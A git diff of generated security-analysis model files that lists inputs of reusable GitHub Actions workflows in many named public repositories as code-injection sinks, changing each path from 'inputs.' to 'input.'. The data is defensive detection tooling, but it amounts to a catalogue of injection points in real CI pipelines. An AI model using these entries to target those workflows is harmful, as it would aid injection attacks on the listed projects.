@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "inputs.mdix-mahapps-version", "code-injection", "generated"] - - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "inputs.mdix-colors-version", "code-injection", "generated"] - - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "inputs.mdix-version", "code-injection", "generated"] - - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "inputs.build-configuration", "code-injection", "generated"] \ No newline at end of file + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-mahapps-version", "code-injection", "generated"] + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-colors-version", "code-injection", "generated"] + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-version", "code-injection", "generated"] + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.build-configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml index 2f30003359c..d1097c47aeb 100644 --- a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["matter-labs/zksync-era/.github/workflows/ci-core-reusable.yml", "*", "inputs.compilers", "code-injection", "generated"] - - ["matter-labs/zksync-era/.github/workflows/build-prover-template.yml", "*", "inputs.image_tag_suffix", "code-injection", "generated"] \ No newline at end of file + - ["matter-labs/zksync-era/.github/workflows/ci-core-reusable.yml", "*", "input.compilers", "code-injection", "generated"] + - ["matter-labs/zksync-era/.github/workflows/build-prover-template.yml", "*", "input.image_tag_suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml index ed9091f37ae..8d7fb64ad3a 100644 --- a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mattermost/desktop/.github/workflows/e2e-functional-template.yml", "*", "inputs.nightly", "code-injection", "generated"] \ No newline at end of file + - ["mattermost/desktop/.github/workflows/e2e-functional-template.yml", "*", "input.nightly", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml index d940c6a98b0..d7790e533c9 100644 --- a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml 
@@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "inputs.name", "code-injection", "generated"] - - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "inputs.drivername", "code-injection", "generated"] - - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "inputs.datasource", "code-injection", "generated"] - - ["mattermost/mattermost/.github/workflows/mmctl-test-template.yml", "*", "inputs.datasource", "code-injection", "generated"] - - ["mattermost/mattermost/.github/workflows/esrupgrade-common.yml", "*", "inputs.db-dump-url", "code-injection", "generated"] \ No newline at end of file + - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.name", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.drivername", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.datasource", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/mmctl-test-template.yml", "*", "input.datasource", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/esrupgrade-common.yml", "*", "input.db-dump-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml index 57b56667fbe..093ed8bcfd1 100644 --- a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mealie-recipes/mealie/.github/workflows/partial-builder.yml", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file + - ["mealie-recipes/mealie/.github/workflows/partial-builder.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml index 4ffee539cd4..0ce99bc5fa9 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml 
@@ -3,14 +3,14 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.adapter_version", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.sm_version", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.expected_resources_namespaces", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.expected_resources_types", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.expected_resources", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.adapter_name", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.patternfile_name", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.service_url", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.deployment_url", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.provider", "code-injection", "generated"] - - ["meshery/meshery/.github/workflows/test_adapters.yaml", "*", "inputs.adapter_version", "code-injection", "generated"] \ No newline at end of file + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.adapter_version", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.sm_version", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.expected_resources_namespaces", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.expected_resources_types", 
"code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.expected_resources", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.adapter_name", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.patternfile_name", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.service_url", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.deployment_url", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.provider", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adapters.yaml", "*", "input.adapter_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml index bfe525b2c0e..2767dfbec76 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml 
@@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["meshtastic/firmware/.github/workflows/build_rpi2040.yml", "*", "inputs.board", "code-injection", "generated"] - - ["meshtastic/firmware/.github/workflows/build_nrf52.yml", "*", "inputs.board", "code-injection", "generated"] - - ["meshtastic/firmware/.github/workflows/build_esp32_s3.yml", "*", "inputs.board", "code-injection", "generated"] - - ["meshtastic/firmware/.github/workflows/build_esp32_c3.yml", "*", "inputs.board", "code-injection", "generated"] - - ["meshtastic/firmware/.github/workflows/build_esp32.yml", "*", "inputs.board", "code-injection", "generated"] \ No newline at end of file + - ["meshtastic/firmware/.github/workflows/build_rpi2040.yml", "*", "input.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_nrf52.yml", "*", "input.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_esp32_s3.yml", "*", "input.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_esp32_c3.yml", "*", "input.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_esp32.yml", "*", "input.board", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml index 647bd0ae193..2c5679329c1 100644 --- a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microcks/microcks/.github/workflows/package-native.yml", "*", "inputs.image-tag", "code-injection", "generated"] \ No newline at end of file + - ["microcks/microcks/.github/workflows/package-native.yml", "*", "input.image-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml index b09fcb7f102..b3e26a1cf13 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/applicationinsights-java/.github/workflows/reusable-scheduled-job-notification.yml", "*", "inputs.success", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/applicationinsights-java/.github/workflows/reusable-scheduled-job-notification.yml", "*", "input.success", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml index f83101f511c..963b64673a9 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml 
@@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/chat-copilot/.github/workflows/copilot-run-integration-tests.yml", "*", "inputs.BACKEND_HOST", "code-injection", "generated"] - - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-plugins.yml", "*", "inputs.DEPLOYMENT_NAME", "code-injection", "generated"] - - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-plugins.yml", "*", "inputs.ARTIFACT_NAME", "code-injection", "generated"] - - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-memorypipeline.yml", "*", "inputs.DEPLOYMENT_NAME", "code-injection", "generated"] - - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-backend.yml", "*", "inputs.DEPLOYMENT_NAME", "code-injection", "generated"] - - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-backend.yml", "*", "inputs.ARTIFACT_NAME", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/chat-copilot/.github/workflows/copilot-run-integration-tests.yml", "*", "input.BACKEND_HOST", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-plugins.yml", "*", "input.DEPLOYMENT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-plugins.yml", "*", "input.ARTIFACT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-memorypipeline.yml", "*", "input.DEPLOYMENT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-backend.yml", "*", "input.DEPLOYMENT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-backend.yml", "*", "input.ARTIFACT_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml index 7a60c93516d..fcf55466a9e 100644 
--- a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml 
@@ -3,16 +3,16 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "inputs.tls", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "inputs.config", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.sanitize", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.plat", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.static", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.tls", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.config", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "inputs.sanitize", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "inputs.codecheck", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "inputs.systemcrypto", "code-injection", "generated"] - - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "inputs.plat", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.arch", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.tls", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.config", "code-injection", 
"generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "input.sanitize", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "input.plat", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "input.arch", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "input.static", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "input.tls", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "input.config", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "input.sanitize", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "input.codecheck", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "input.systemcrypto", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "input.plat", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml index 14d7e741dac..979bd414141 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/oryx/.github/workflows/automationTemplate.yaml", "*", "inputs.platformName", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/oryx/.github/workflows/automationTemplate.yaml", "*", "input.platformName", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml index bb0e3a6a2b6..55d810d29b5 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/pr-metrics/.github/workflows/release-phase-1-internal.yml", "*", "inputs.patch", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/pr-metrics/.github/workflows/release-phase-1-internal.yml", "*", "input.patch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml index aa8f4e6b518..19350db868c 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml 
@@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.extraRunWindowsArgs", "code-injection", "generated"] - - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.platform", "code-injection", "generated"] - - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.extraInitWindowsArgs", "code-injection", "generated"] - - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.reactNativeWindowsVersion", "code-injection", "generated"] - - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.sampleName", "code-injection", "generated"] - - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "inputs.extraRunWindowsArgs", "code-injection", "generated"] - - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "inputs.platform", "code-injection", "generated"] - - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "inputs.sampleName", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.extraRunWindowsArgs", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.platform", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.extraInitWindowsArgs", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.reactNativeWindowsVersion", "code-injection", "generated"] + - 
["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.sampleName", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "input.extraRunWindowsArgs", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "input.platform", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "input.sampleName", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml index c9af1a40ddc..8d9af1a4e15 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/vscode-cpptools/.github/workflows/job-compile-and-test.yml", "*", "inputs.yarn-args", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/vscode-cpptools/.github/workflows/job-compile-and-test.yml", "*", "input.yarn-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml index 863bc645d98..47c09bf4f63 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml 
@@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.env", "code-injection", "generated"] - - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.includes", "code-injection", "generated"] - - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.tags", "code-injection", "generated"] - - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.kinds", "code-injection", "generated"] - - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.pkgs", "code-injection", "generated"] \ No newline at end of file + - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.env", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.includes", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.tags", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.kinds", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.pkgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml index 6e898a4e452..4ff0273b47a 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["moby/moby/.github/workflows/.windows.yml", "*", "inputs.storage", "code-injection", "generated"] - - ["moby/moby/.github/workflows/.windows.yml", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file + - ["moby/moby/.github/workflows/.windows.yml", "*", "input.storage", "code-injection", "generated"] + - ["moby/moby/.github/workflows/.windows.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml index a08a96a897e..ba53c900ce8 100644 --- a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml 
@@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.context", "code-injection", "generated"] - - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.tags", "code-injection", "generated"] - - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.image-name", "code-injection", "generated"] - - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.image-uuid", "code-injection", "generated"] - - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.staging-repo", "code-injection", "generated"] - - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.staging", "code-injection", "generated"] \ No newline at end of file + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.context", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.tags", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.image-name", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.image-uuid", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.staging-repo", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.staging", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml index f7aafb13455..e43a220a278 100644 --- a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "inputs.test", "code-injection", "generated"] - - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "input.test", "code-injection", "generated"] + - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml index 6107ae0e57c..dd20d310079 100644 --- a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mudler/localai/.github/workflows/image_build.yml", "*", "inputs.latest-image-aio", "code-injection", "generated"] - - ["mudler/localai/.github/workflows/image_build.yml", "*", "inputs.latest-image", "code-injection", "generated"] \ No newline at end of file + - ["mudler/localai/.github/workflows/image_build.yml", "*", "input.latest-image-aio", "code-injection", "generated"] + - ["mudler/localai/.github/workflows/image_build.yml", "*", "input.latest-image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml index 74e0182cc4f..3b9777b3f3a 100644 --- a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml 
@@ -3,13 +3,13 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.amazonflag", "code-injection", "generated"] - - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.magiskver", "code-injection", "generated"] - - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.root", "code-injection", "generated"] - - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.gapps", "code-injection", "generated"] - - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.amazonflag", "code-injection", "generated"] - - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.magiskver", "code-injection", "generated"] - - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.root", "code-injection", "generated"] - - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.gapps", "code-injection", "generated"] - - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.amazonflag", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.magiskver", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.root", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.gapps", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.arch", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "input.amazonflag", "code-injection", "generated"] + - 
